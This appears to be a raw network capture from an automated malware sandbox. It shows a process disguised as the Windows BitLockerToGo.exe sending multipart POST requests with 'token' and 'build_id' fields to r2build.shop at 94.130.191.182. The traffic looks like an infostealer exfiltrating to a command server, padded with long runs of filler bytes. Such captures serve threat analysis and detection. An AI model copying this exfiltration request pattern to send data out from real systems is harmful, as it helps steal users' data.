                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:58 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    22192.168.2.44978694.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----y5fc2vsr1db1n7gvsjwl
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 131557
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 66 63 32 76 73 72 31 64 62 31 6e 37 67 76 73 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 32 76 73 72 31 64 62 31 6e 37 67 76 73 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 32 76 73 72 31 64 62 31 6e 37 67 76 73 6a 77 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------y5fc2vsr1db1n7gvsjwlContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------y5fc2vsr1db1n7gvsjwlContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------y5fc2vsr1db1n7gvsjwlCont
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
